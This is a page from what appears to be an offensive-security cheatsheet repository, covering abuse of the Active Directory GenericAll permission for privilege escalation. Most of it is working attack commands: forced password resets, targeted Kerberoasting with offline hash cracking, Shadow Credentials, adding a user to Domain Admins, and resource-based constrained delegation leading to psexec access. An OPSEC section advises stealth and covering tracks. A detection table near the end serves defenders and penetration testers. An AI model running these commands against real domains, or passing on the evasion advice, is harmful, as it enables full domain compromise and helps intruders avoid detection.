daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-19-genericall-abuse.md (18928B)


      1 ---
      2 title: "Attack #19 โ€” GenericAll Abuse"
      3 description: "GenericAll is the most dangerous misconfigured ACL permission in Active Directory. It grants a principal (user, group, or computer) full control over aโ€ฆ"
      4 category: active-directory
      5 subcategory: "ACL Abuse"
      6 tags: ["active-directory", "kerberos", "adcs", "delegation", "privilege-escalation"]
      7 tools: ["NetExec", "Impacket", "Rubeus", "Certipy", "BloodHound"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Three/๐ŸŸก Attack #19 โ€” GenericAll Abuse.md"
     11 ---
     12 # ๐ŸŸก Attack #19 โ€” GenericAll Abuse
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 GenericAll is the **most dangerous misconfigured ACL permission in Active Directory**. It grants a principal (user, group, or computer) **full control** over a target AD object โ€” equivalent to owning it entirely. When a low-privileged user has GenericAll over a high-value target (Domain Admin account, privileged group, computer object, GPO, or OU), they can escalate to full domain compromise in a single move.
     19 
     20 The attack exploits the **Discretionary Access Control List (DACL)** that governs permissions on every AD object. DACLs contain Access Control Entries (ACEs) that define which principals can perform which operations on the object. A GenericAll ACE grants the equivalent of all individual permissions combined: read, write, delete, modify owner, modify DACL, reset password, write to any attribute, and add/remove group members. These misconfigurations are **extremely common** in enterprise environments โ€” often introduced by helpdesk delegation, migration tools, Exchange setup, or administrators who didn't understand the permission model.
     21 
     22 ### What GenericAll Lets You Do (By Target Type)
     23 
     24 | Target Object Type | What You Can Do | Impact |
     25 |---|---|---|
     26 | **User** | Reset their password, set SPN (Kerberoast), write to msDS-KeyCredentialLink (Shadow Credentials) | Full account takeover โ€” if target is DA, you own the domain |
     27 | **Group** | Add yourself (or any user) as a member | Instant privilege escalation โ€” add yourself to Domain Admins |
     28 | **Computer** | Write msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD), read LAPS password | Machine compromise, RBCD โ†’ impersonate any user to that host |
     29 | **GPO** | Modify Group Policy โ€” add scheduled tasks, startup scripts, user rights | Push malicious config to all machines linked to that GPO |
     30 | **OU** | Modify inheritance, add malicious GPO links | Control all objects in the OU |
     31 | **Domain Object** | Write to any domain-level attribute โ€” DCSync ACE, modify trusts | Total domain compromise |
     32 
     33 ### The Full Attack Flow
     34 
     35 ```
     36 1. Gain initial foothold (any domain user account)
     37 2. Run BloodHound or PowerView to enumerate ACLs
     38 3. Identify GenericAll edges from your controlled principal to high-value targets
     39 4. Exploit based on target object type:
     40    - User โ†’ reset password or set Shadow Credentials
     41    - Group โ†’ add yourself as a member
     42    - Computer โ†’ configure RBCD or read LAPS
     43 5. Escalate to Domain Admin
     44 6. Optionally restore original ACL state to cover tracks
     45 ```
     46 
     47 ***
     48 
     49 ## โš™๏ธ Prerequisites
     50 
     51 | Requirement | Detail |
     52 |---|---|
     53 | **Domain user account** | Any authenticated domain user โ€” GenericAll is the permission YOU already have |
     54 | **GenericAll ACE on target** | Must exist in the target object's DACL โ€” use BloodHound or PowerView to find it |
     55 | **Network access to DC** | LDAP (389/636) access for ACL queries and modifications |
     56 
     57 ***
     58 
     59 ## ๐Ÿ› ๏ธ Tools
     60 
     61 | Tool | Platform | Notes |
     62 |---|---|---|
     63 | **BloodHound + SharpHound** | Windows/Linux | Visual attack path mapping โ€” identifies GenericAll edges automatically |
     64 | **PowerView** | Windows | `Get-ObjectAcl`, `Add-DomainGroupMember`, `Set-DomainUserPassword` |
     65 | **Impacket โ€” dacledit.py** | Linux | Edit DACLs remotely โ€” add/remove ACEs from Linux |
     66 | **Impacket โ€” owneredit.py** | Linux | Change object ownership |
     67 | **Impacket โ€” addcomputer.py** | Linux | Create machine accounts (for RBCD exploitation) |
     68 | **bloodyAD** | Linux | All-in-one AD exploitation โ€” ACL abuse, password reset, group membership |
     69 | **ldap_shell** | Linux | Interactive LDAP shell โ€” for quick ACL exploitation |
     70 | **Certipy** | Linux | Shadow Credentials exploitation when GenericAll on user/computer |
     71 
     72 ***
     73 
     74 ## ๐Ÿ’ป Full Commands
     75 
     76 ### ๐Ÿ”ต Step 1 โ€” Enumerate GenericAll Permissions
     77 
     78 #### BloodHound (Recommended โ€” Visual Attack Paths)
     79 
     80 ```powershell
     81 # โ”€โ”€ Collect data with SharpHound โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     82 .\SharpHound.exe -c All --zipfilename bloodhound_data.zip
     83 # Or
     84 .\SharpHound.exe -c All,GPOLocalGroup --zipfilename bloodhound_data.zip
     85 
     86 # โ”€โ”€ Upload to BloodHound and run queries:
     87 # Pre-built query: "Find Shortest Paths to Domain Admins"
     88 # Pre-built query: "Find Principals with DCSync Rights"
     89 # Custom Cypher: Find all GenericAll edges from your user
     90 # MATCH p=(n {name:'LOW_USER@CORP.LOCAL'})-[r:GenericAll]->(m) RETURN p
     91 ```
     92 
     93 ```bash
     94 # โ”€โ”€ Linux โ€” BloodHound.py (remote collection without touching the target) โ”€โ”€โ”€โ”€
     95 bloodhound-python -u low_user -p 'Password1' -d corp.local -ns 10.10.10.10 \
     96   -c All --zip
     97 # Upload the resulting .zip to BloodHound GUI
     98 ```
     99 
    100 #### PowerView (Detailed ACL Enumeration)
    101 
    102 ```powershell
    103 # โ”€โ”€ Find objects where your user has GenericAll โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    104 Import-Module .\PowerView.ps1
    105 
    106 # Get ACLs where current user has GenericAll on any object
    107 Get-ObjectAcl -Identity "Domain Admins" -ResolveGUIDs | 
    108   Where-Object { $_.ActiveDirectoryRights -match "GenericAll" } |
    109   Select-Object SecurityIdentifier, ActiveDirectoryRights, ObjectDN
    110 
    111 # Resolve SIDs to names
    112 Get-ObjectAcl -Identity "Domain Admins" -ResolveGUIDs | 
    113   Where-Object { $_.ActiveDirectoryRights -match "GenericAll" } |
    114   ForEach-Object { 
    115     $_ | Add-Member -NotePropertyName "Principal" -NotePropertyValue (
    116       Convert-SidToName $_.SecurityIdentifier
    117     ) -PassThru
    118   } | Select-Object Principal, ActiveDirectoryRights, ObjectDN
    119 
    120 # โ”€โ”€ Enumerate all ACL attack paths from a specific user โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    121 Find-InterestingDomainAcl -ResolveGUIDs | 
    122   Where-Object { $_.IdentityReferenceName -match "low_user" }
    123 
    124 # โ”€โ”€ Check specific object for dangerous ACEs โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    125 Get-ObjectAcl -SamAccountName "Administrator" -ResolveGUIDs | 
    126   Where-Object { $_.ActiveDirectoryRights -match "GenericAll|WriteDacl|WriteOwner|GenericWrite" }
    127 ```
    128 
    129 ***
    130 
    131 ### ๐Ÿ”ด Exploitation โ€” GenericAll on a USER
    132 
    133 ```powershell
    134 # โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
    135 # METHOD 1: Force Password Reset (loudest โ€” generates 4724 event)
    136 # โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
    137 
    138 # โ”€โ”€ PowerView โ€” reset the target user's password โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    139 $NewPassword = ConvertTo-SecureString 'P@ssword123!' -AsPlainText -Force
    140 Set-DomainUserPassword -Identity targetadmin -AccountPassword $NewPassword -Verbose
    141 
    142 # โ”€โ”€ Native PowerShell (AD module) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    143 Set-ADAccountPassword -Identity targetadmin -NewPassword (
    144   ConvertTo-SecureString 'P@ssword123!' -AsPlainText -Force
    145 ) -Reset
    146 
    147 # โ”€โ”€ net user โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    148 net user targetadmin P@ssword123! /domain
    149 
    150 # โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
    151 # METHOD 2: Targeted Kerberoasting (stealthier โ€” set SPN, roast, remove SPN)
    152 # โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
    153 
    154 # Step 1: Set an SPN on the target user (requires GenericAll/GenericWrite)
    155 Set-DomainObject -Identity targetadmin -Set @{serviceprincipalname='nonexist/YOURSPN'}
    156 
    157 # Step 2: Request TGS for the newly-set SPN (Kerberoast)
    158 .\Rubeus.exe kerberoast /user:targetadmin /outfile:targeted_roast.txt
    159 
    160 # Step 3: Crack the hash offline
    161 hashcat -m 13100 targeted_roast.txt rockyou.txt --force
    162 
    163 # Step 4: Remove the SPN (cover tracks)
    164 Set-DomainObject -Identity targetadmin -Clear serviceprincipalname
    165 
    166 # โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
    167 # METHOD 3: Shadow Credentials (stealthiest โ€” write msDS-KeyCredentialLink)
    168 # โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
    169 
    170 # Windows โ€” Whisker
    171 .\Whisker.exe add /target:targetadmin /domain:corp.local
    172 # Whisker outputs a Rubeus command to request a TGT with the new credential
    173 # Run the outputted command to get a TGT as targetadmin
    174 
    175 # Linux โ€” pywhisker
    176 python3 pywhisker.py -d corp.local -u low_user -p 'Password1' \
    177   --target targetadmin --action add --dc-ip 10.10.10.10
    178 # Then use the generated PFX certificate to authenticate:
    179 # certipy auth -pfx <generated>.pfx -dc-ip 10.10.10.10
    180 ```
    181 
    182 ```bash
    183 # โ”€โ”€ Linux โ€” Reset password via Impacket / bloodyAD โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    184 
    185 # bloodyAD (simplest)
    186 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \
    187   set password targetadmin 'P@ssword123!'
    188 
    189 # Impacket โ€” using rpcclient-style approach
    190 net rpc password targetadmin 'P@ssword123!' -U 'corp.local/low_user%Password1' \
    191   -S DC01.corp.local
    192 
    193 # Impacket โ€” ldap_shell for interactive exploitation
    194 python3 ldap_shell.py corp.local/low_user:'Password1'@DC01.corp.local
    195 # > set_password targetadmin P@ssword123!
    196 
    197 # Shadow Credentials from Linux
    198 certipy shadow auto -u low_user@corp.local -p 'Password1' \
    199   -account targetadmin -dc-ip 10.10.10.10 -dc-host dc01.corp.local
    200 ```
    201 
    202 ***
    203 
    204 ### ๐Ÿ”ด Exploitation โ€” GenericAll on a GROUP
    205 
    206 ```powershell
    207 # โ”€โ”€ Add yourself to Domain Admins โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    208 # PowerView
    209 Add-DomainGroupMember -Identity "Domain Admins" -Members "low_user" -Verbose
    210 
    211 # Native PowerShell
    212 Add-ADGroupMember -Identity "Domain Admins" -Members "low_user"
    213 
    214 # net group
    215 net group "Domain Admins" low_user /add /domain
    216 
    217 # โ”€โ”€ Verify โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    218 Get-ADGroupMember -Identity "Domain Admins" | Select-Object Name
    219 net group "Domain Admins" /domain
    220 ```
    221 
    222 ```bash
    223 # โ”€โ”€ Linux โ€” Add yourself to group โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    224 
    225 # bloodyAD
    226 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \
    227   add groupMember "Domain Admins" low_user
    228 
    229 # Impacket โ€” ldap_shell
    230 python3 ldap_shell.py corp.local/low_user:'Password1'@DC01.corp.local
    231 # > add_user_to_group low_user "Domain Admins"
    232 
    233 # NetExec โ€” verify
    234 nxc smb DC01.corp.local -u low_user -p 'Password1' -x "whoami /groups"
    235 ```
    236 
    237 ***
    238 
    239 ### ๐Ÿ”ด Exploitation โ€” GenericAll on a COMPUTER
    240 
    241 ```powershell
    242 # โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
    243 # METHOD 1: Resource-Based Constrained Delegation (RBCD)
    244 # โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
    245 
    246 # Step 1: Create a machine account (or use one you control)
    247 New-MachineAccount -MachineAccount FAKEMACHINE -Password $(ConvertTo-SecureString 'FakePass123!' -AsPlainText -Force)
    248 
    249 # Step 2: Get the SID of your machine account
    250 $ComputerSid = Get-DomainComputer FAKEMACHINE -Properties objectsid | Select -Expand objectsid
    251 
    252 # Step 3: Write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute
    253 $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
    254 $SDBytes = New-Object byte[] ($SD.BinaryLength)
    255 $SD.GetBinaryForm($SDBytes, 0)
    256 Set-DomainObject -Identity TARGET_COMPUTER$ -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
    257 
    258 # Step 4: S4U2Self + S4U2Proxy to impersonate DA to target
    259 .\Rubeus.exe s4u /user:FAKEMACHINE$ /rc4:<FAKEMACHINE_HASH> \
    260   /impersonateuser:Administrator \
    261   /msdsspn:CIFS/TARGET_COMPUTER.corp.local /ptt
    262 
    263 # โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
    264 # METHOD 2: Read LAPS Password (if LAPS is deployed)
    265 # โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
    266 Get-DomainComputer TARGET_COMPUTER -Properties ms-Mcs-AdmPwd
    267 # Output: ms-Mcs-AdmPwd = <cleartext local admin password>
    268 ```
    269 
    270 ```bash
    271 # โ”€โ”€ Linux โ€” RBCD exploitation โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    272 
    273 # Step 1: Create machine account
    274 addcomputer.py -computer-name 'FAKEMACHINE$' -computer-pass 'FakePass123!' \
    275   -dc-ip 10.10.10.10 corp.local/low_user:'Password1'
    276 
    277 # Step 2: Configure RBCD
    278 rbcd.py -delegate-from 'FAKEMACHINE$' -delegate-to 'TARGET_COMPUTER$' \
    279   -action write -dc-ip 10.10.10.10 corp.local/low_user:'Password1'
    280 
    281 # Step 3: Get impersonated ticket via S4U
    282 getST.py -spn cifs/TARGET_COMPUTER.corp.local -impersonate Administrator \
    283   -dc-ip 10.10.10.10 corp.local/'FAKEMACHINE$':'FakePass123!'
    284 
    285 # Step 4: Use the ticket
    286 export KRB5CCNAME=Administrator@cifs_TARGET_COMPUTER.corp.local@CORP.LOCAL.ccache
    287 psexec.py -k -no-pass corp.local/Administrator@TARGET_COMPUTER.corp.local
    288 ```
    289 
    290 ***
    291 
    292 ## ๐ŸŽฏ OPSEC Tips
    293 
    294 - **Prefer Shadow Credentials over password reset** โ€” Shadow Credentials (writing msDS-KeyCredentialLink) are stealthier because the original user's password remains unchanged and they can still log in normally; password resets immediately alert the target user and generate Event 4724
    295 - **Targeted Kerberoasting is the middle ground** โ€” setting a temporary SPN, roasting, and removing the SPN is stealthier than password reset but noisier than Shadow Credentials
    296 - **Remove yourself from groups after** โ€” if you add yourself to Domain Admins, extract what you need (KRBTGT hash via DCSync) and then remove yourself; the shorter the group membership window, the less likely detection
    297 - **Check AdminCount** โ€” users with `adminCount=1` are protected by AdminSDHolder; modifying their permissions may be reverted every 60 minutes
    298 - **Log the original ACL state** โ€” before modifying any ACLs for exploitation, save the original state so you can restore it to cover your tracks
    299 
    300 ***
    301 
    302 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
    303 
    304 | Event ID | Source | What to Look For |
    305 |---|---|---|
    306 | **4724** | Security Log | Password reset attempt โ€” monitor for non-helpdesk accounts resetting privileged user passwords |
    307 | **4728** | Security Log | User added to a security-enabled global group โ€” DA group modification |
    308 | **4732** | Security Log | User added to a security-enabled local group |
    309 | **4756** | Security Log | User added to a security-enabled universal group โ€” Enterprise Admins |
    310 | **5136** | Security Log | Directory service object modification โ€” ACL changes, attribute writes (msDS-KeyCredentialLink, msDS-AllowedToActOnBehalfOfOtherIdentity) |
    311 | **4662** | Security Log | Operation performed on an AD object โ€” catches GenericAll usage |
    312 | **4738** | Security Log | User account changed โ€” SPN modification for targeted Kerberoasting |
    313 
    314 **Primary detection signature:** Monitor Event ID **5136** for modifications to sensitive attributes: `msDS-KeyCredentialLink` (Shadow Credentials), `msDS-AllowedToActOnBehalfOfOtherIdentity` (RBCD), and `servicePrincipalName` (targeted Kerberoasting). Combined with **4728** for unexpected Domain Admins group additions and **4724** for password resets of privileged accounts by non-privileged users. BloodHound's "Dangerous Rights" queries run defensively can identify these misconfigurations before attackers do.
    315 
    316 ***
    317 
    318 ## ๐Ÿ”— Attack Chain Context
    319 
    320 ```
    321 [GenericAll Abuse] โ”€โ”€โ†’ Direct Privilege Escalation
    322          โ”‚
    323          โ”œโ”€โ”€โ†’ ๐Ÿ‘ค GenericAll on User โ†’ password reset / Shadow Creds / Kerberoast
    324          โ”œโ”€โ”€โ†’ ๐Ÿ‘ฅ GenericAll on Group โ†’ add self to Domain Admins
    325          โ”œโ”€โ”€โ†’ ๐Ÿ’ป GenericAll on Computer โ†’ RBCD / LAPS password read
    326          โ”œโ”€โ”€โ†’ ๐Ÿ“‹ GenericAll on GPO โ†’ push malicious Group Policy
    327          โ”œโ”€โ”€โ†’ ๐Ÿ”‘ After DA โ†’ DCSync (Attack #37) โ†’ Golden Ticket (Attack #11)
    328          โ”œโ”€โ”€โ†’ ๐Ÿ”— Chain with: WriteDACL (#21), WriteOwner (#22), RBCD (#17)
    329          โ””โ”€โ”€โ†’ ๐Ÿ’€ Defeated by: ACL auditing, least privilege, AdminSDHolder
    330 ```
    331 
    332 **GenericAll is the most common ACL-based escalation path** found in real-world AD pentests. BloodHound consistently reveals GenericAll edges that organisations didn't know existed โ€” often created years ago during migration, delegation setup, or Exchange installation. Run BloodHound defensively to find these paths before attackers do.
    333 
    334 ***
    335 
    336 > โœ… **Attack #19 โ€” GenericAll Abuse complete.**